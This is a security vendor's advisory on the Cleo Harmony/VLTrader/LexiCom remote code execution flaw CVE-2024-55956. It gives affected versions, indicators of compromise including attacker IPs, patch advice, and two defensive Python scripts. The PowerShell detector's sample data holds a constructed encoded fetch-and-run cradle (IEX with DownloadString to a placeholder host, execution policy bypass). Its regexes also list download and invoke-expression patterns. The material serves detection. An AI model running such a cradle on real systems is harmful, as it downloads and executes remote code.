    December 17, 2024

    Vulnerabilities in Cleo Software Allow for Unauthenticated Remote Code Execution via CVE-2024-55956


    What Happened

    On December 9th, Huntress released a threat advisory reporting a vulnerability and active exploitation of the file transfer management software offered by Cleo, a software company known for its ‘ecosystem integration platform’.

    Designated CVE-2024-55956, the issue is an unrestricted file upload and download vulnerability that can lead to remote code execution. It affects versions of Cleo’s Harmony, VLTrader, and LexiCom software prior to 5.8.0.24. It is also important to note that exploitation has been confirmed to require no prior authentication. Unauthenticated remote code execution vulnerabilities are valuable targets for threat actors because they allow direct system compromise without needing to bypass authentication controls or obtain valid credentials first. Huntress and Rapid7 have both confirmed observations of active exploitation attempts in the wild.

    | CVE ID | CVSS | Summary |
    |---|---|---|
    | CVE-2024-55956 | High - 8.8 | In Cleo Harmony before 5.8.0.24, VLTrader before 5.8.0.24, and LexiCom before 5.8.0.24, an unauthenticated user can import and execute arbitrary Bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory. |

    It’s also important to note that two CVE IDs are attributed to this vulnerability. This may be slightly confusing, so here is a short explanation:

    • CVE-2024-50623: issued to track the original remote code execution vulnerability disclosed by Cleo in October 2024. The patch released to address this CVE was revealed to be inadequate in preventing exploitation.
    • CVE-2024-55956: issued to track the bypass of the original patch, and the current CVE used to track these Cleo remote code execution vulnerabilities.

    If you are still unsure or don’t have time to dive into the specifics, just make sure your Cleo software is on 5.8.0.24 or higher. That way, you’re protected from both of these CVEs.

    What That Means

    Administrators managing Harmony, VLTrader, and LexiCom software should patch immediately to version 5.8.0.24 or higher. Vulnerabilities affecting these products can lead to remote code execution and allow an attacker into your network. Additionally, “in the wild” scanning and exploitation of these vulnerabilities has been confirmed by multiple sources.

    Exploitation of this vulnerability allows an attacker to gain a foothold in the network. From there, they may decide to pivot within the network or act more quickly and deploy ransomware right from the initial compromised host. In some confirmed instances of exploitation, defenders have seen attackers move further into the network and attempt to perform domain reconnaissance using tools such as nltest.

    Who’s Impacted

    The following list has been lifted directly from the Cleo Product Security Update for CVE-2024-55956:

    • Cleo Harmony® (prior to version 5.8.0.24)
    • Cleo VLTrader® (prior to version 5.8.0.24)
    • Cleo LexiCom® (prior to version 5.8.0.24)

    How Would I Know and What Should I Do

    Several indicators of compromise have been revealed by Huntress researchers:

    Look for file artifacts under your Harmony, VLTrader, or LexiCom installation directory, typically under C:\ or C:\Program Files (x86) - e.g. C:\LexiCom or C:\Program Files (x86)\Lexicom. The IP addresses listed below have been associated with confirmed Cleo attacks.

    | IoC Type | IoC |
    |---|---|
    | File Artifact | Autorun\healthchecktemplate.txt |
    | File Artifact | Autorun\healthcheck.txt |
    | File Artifact | Main.xml |
    | File Artifact | 60282967-dc91-40ef-a34c-38e992509c2c.xml |
    | Attacker IP | 176.123.5.126 |
    | Attacker IP | 5.149.249.226 |
    | Attacker IP | 185.181.230.103 |
    | Attacker IP | 209.127.12.38 |
    | Attacker IP | 181.214.147.164 |
    | Attacker IP | 192.119.99.42 |

    Huntress researchers have collected examples of these file artifacts and have reported that they contain encoded PowerShell commands. Additionally, there may be a .dbg log file under the logs directory (e.g. C:\LexiCom\logs) that you can review to identify whether any suspicious files have been uploaded to the Autorun directory. The Cleo Autorun feature and directory appear to be a pivotal component of the exploit chain.
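    As an added example (not code from the original post, Blumira, Cleo or Huntress), the script below turns the version guidance above and the IoC table into a repeatable triage check for one Cleo installation: it compares a version string against 5.8.0.24, looks for the named file artifacts under the install directory, and scans log files for the listed attacker IPs. It assumes the logs live under <install>/logs, matches artifacts by file name only, and builds a constructed LexiCom directory tree in a temporary folder so it runs offline; the log lines in that tree are invented sample data, not real Cleo output.

```python
import re
import tempfile
from pathlib import Path

# Patched version from the Cleo advisory: 5.8.0.24 and later.
FIXED_VERSION = (5, 8, 0, 24)

# File artifacts reported by Huntress, relative to the Cleo install directory
# (e.g. C:\LexiCom). Names are taken from the IoC table in the post.
ARTIFACT_PATHS = [
    Path("Autorun") / "healthchecktemplate.txt",
    Path("Autorun") / "healthcheck.txt",
    Path("Main.xml"),
    Path("60282967-dc91-40ef-a34c-38e992509c2c.xml"),
]

# Attacker IPs from the IoC table in the post.
ATTACKER_IPS = {
    "176.123.5.126", "5.149.249.226", "185.181.230.103",
    "209.127.12.38", "181.214.147.164", "192.119.99.42",
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
LOG_SUFFIXES = {".dbg", ".log", ".txt"}


def is_vulnerable_version(version: str) -> bool:
    """True if a dotted Cleo version string (e.g. '5.8.0.21') sorts before 5.8.0.24."""
    parts = tuple(int(p) for p in version.strip().split("."))
    parts += (0,) * (len(FIXED_VERSION) - len(parts))  # pad '5.8' to '5.8.0.0'
    return parts < FIXED_VERSION


def find_artifacts(install_dir) -> list:
    """Return the known artifact paths (POSIX form) that exist under install_dir."""
    root = Path(install_dir)
    return [rel.as_posix() for rel in ARTIFACT_PATHS if (root / rel).exists()]


def find_attacker_ips(log_dir) -> dict:
    """Map each attacker IP seen in log files under log_dir to 'file:line' references."""
    hits = {}
    for path in Path(log_dir).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in LOG_SUFFIXES:
            continue
        with path.open("r", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                for ip in IPV4_RE.findall(line):
                    if ip in ATTACKER_IPS:
                        hits.setdefault(ip, []).append(f"{path.name}:{lineno}")
    return hits


def triage(install_dir, version: str) -> dict:
    """Run all three checks on one instance; logs are assumed to sit under <install>/logs."""
    root = Path(install_dir)
    return {
        "vulnerable_version": is_vulnerable_version(version),
        "artifacts": find_artifacts(root),
        "attacker_ips": find_attacker_ips(root / "logs"),
    }


def build_demo_install(base_dir) -> Path:
    """Construct a fake LexiCom tree with two artifacts and a constructed .dbg log (sample data only)."""
    root = Path(base_dir) / "LexiCom"
    (root / "Autorun").mkdir(parents=True)
    (root / "logs").mkdir()
    (root / "Autorun" / "healthchecktemplate.txt").write_text("constructed sample\n")
    (root / "Main.xml").write_text("<constructed/>\n")
    (root / "logs" / "LexiCom.dbg").write_text(
        "2024-12-10 03:14:07 INFO  connection from 10.0.0.5\n"        # constructed, benign
        "2024-12-10 03:14:09 INFO  connection from 176.123.5.126\n"   # constructed, IoC IP
        "2024-12-10 03:14:10 INFO  Autorun: processing healthchecktemplate.txt\n"
    )
    return root


def run_demo(version: str = "5.8.0.21") -> dict:
    """Build the constructed tree in a temp dir, triage it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage(build_demo_install(tmp), version)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

    Point `triage()` at a real install directory (e.g. C:\LexiCom) and the version shown in the product's about dialog to get the same three answers for a production host. Absence of these artifacts is not proof of a clean system, since attackers can rename files and the IP list only covers reported infrastructure; treat a hit as a reason to start the containment steps below.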

    If you suspect a Cleo instance has been compromised, you should immediately attempt to contain the incident and establish its scope. In some cases, it may be advisable to isolate the Cleo service, recover from a known-good backup, and apply the latest patches before bringing it back online. It is also recommended to rotate any administrator or user account passwords local to any compromised devices.

    Cleo has also offered resources for response and mitigation (behind a login).

    Workarounds

    If you are unable to patch your Cleo instances in a timely manner, consider taking them offline until you are able to do so, or at least disable any public internet access they may have. Additionally, a temporary workaround has been suggested by Huntress to limit the attack surface. They have stated that this workaround will stop execution, but, “will not prevent the arbitrary file-write vulnerability until a patch is released.”

    When Will It Be Fixed?

    Patches are available and have been released by Cleo:

    • Cleo Harmony® (version 5.8.0.24 or higher)
    • Cleo VLTrader® (version 5.8.0.24 or higher)
    • Cleo LexiCom® (version 5.8.0.24 or higher)

    How Blumira Can Help

    Blumira’s security team actively monitors this issue and looks for additional ways that we can detect any stage of exploitation of these vulnerabilities.

    Several detections and reports are available to our customers and would help reveal any possible exploitation of these vulnerabilities or post-exploitation activity:

    | Type | Name |
    |---|---|
    | Detection | Potential Exploitation of Cleo CVE-2024-55956 - Autorun File Artifacts |
    | Detection | Nltest Domain Enumeration |
    | Detection | AdFind Domain Enumeration |
    | Detection | Reconnaissance via Net Commands |
    | Detection | PowerShell: Encoded Command Execution |
    | Detection (default disabled) | PowerShell: Execution Policy Bypass |
    | Detection | PowerShell: Download Invocation |
    | Report | Windows: Potentially Malicious Powershell |
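    The three PowerShell detections above (encoded command execution, execution policy bypass, download invocation) all key on the process command line, and the post notes that the recovered artifacts contained encoded PowerShell. As an added example that is not Blumira's detection logic or code from the post, the script below shows the core of such a rule: it pulls the argument of `-EncodedCommand` (or any of its accepted prefixes such as `-e`, `-ec`, `-enc`) out of a command line, base64-decodes it as UTF-16LE the way PowerShell does, and checks both the outer command line and the decoded script against a small set of indicators. The log lines are constructed for the example; the indicator list is a starting point and the names of the indicator categories are my own.

```python
import base64
import re

# Outer switch and its argument: "-e", "-enc", "-EncodedCommand" ... followed by a base64 blob.
SWITCH_RE = re.compile(r"(?:^|\s)-(e\w*)\s+([A-Za-z0-9+/=]+)", re.I)

# Indicator categories (names are this example's own, loosely mirroring the detections listed above).
INDICATORS = {
    "download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I),
    "invoke_expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
}


def encode_for_powershell(script: str) -> str:
    """Produce what PowerShell expects after -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str):
    """Return the base64 argument of the encoded-command switch, or None if the line has none."""
    for match in SWITCH_RE.finditer(cmdline):
        switch, blob = match.group(1).lower(), match.group(2)
        # PowerShell accepts any unambiguous prefix of 'encodedcommand'; reject e.g. -ExecutionPolicy.
        if "encodedcommand".startswith(switch) and len(blob) >= 8:
            return blob
    return None


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument; tolerates stripped base64 padding."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded, validate=True).decode("utf-16-le")


def analyze_command_line(cmdline: str) -> dict:
    """Decode any encoded payload and report which indicator categories fire on the whole line."""
    blob = extract_encoded_command(cmdline)
    decoded = None
    if blob is not None:
        try:
            decoded = decode_encoded_command(blob)
        except (ValueError, UnicodeDecodeError):
            decoded = None  # not valid base64/UTF-16LE; still worth flagging as encoded
    haystack = cmdline + "\n" + (decoded or "")
    fired = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"encoded": blob is not None, "decoded": decoded, "indicators": fired}


# Constructed process command lines (sample data, not captured from a real incident).
SAMPLE_LOG_LINES = [
    "powershell.exe -NoProfile -Command Get-Service",
    "powershell.exe -enc " + encode_for_powershell("Write-Output 'hello'"),
    "powershell.exe -ExecutionPolicy Bypass -NonInteractive -e "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/')"),
]


def analyze_samples() -> list:
    """Run the analyzer over the constructed lines in order."""
    return [analyze_command_line(line) for line in SAMPLE_LOG_LINES]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_LOG_LINES, analyze_samples()):
        print(line[:60], "->", result)
```

    In production the input would be the command line from a process creation event (Windows 4688 with command-line auditing, or Sysmon Event ID 1); the decoded script is what you would surface to the analyst, since the base64 alone tells them nothing. The first sample is a plain administrative command and fires no indicator, the second is encoded but benign, and the third trips all three categories.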

    Jake Ouellette

    Jake is an Incident Detection Engineer at Blumira, where he contributes to research and design efforts to continuously improve the detection, analysis, and disruption capabilities of the Blumira platform.
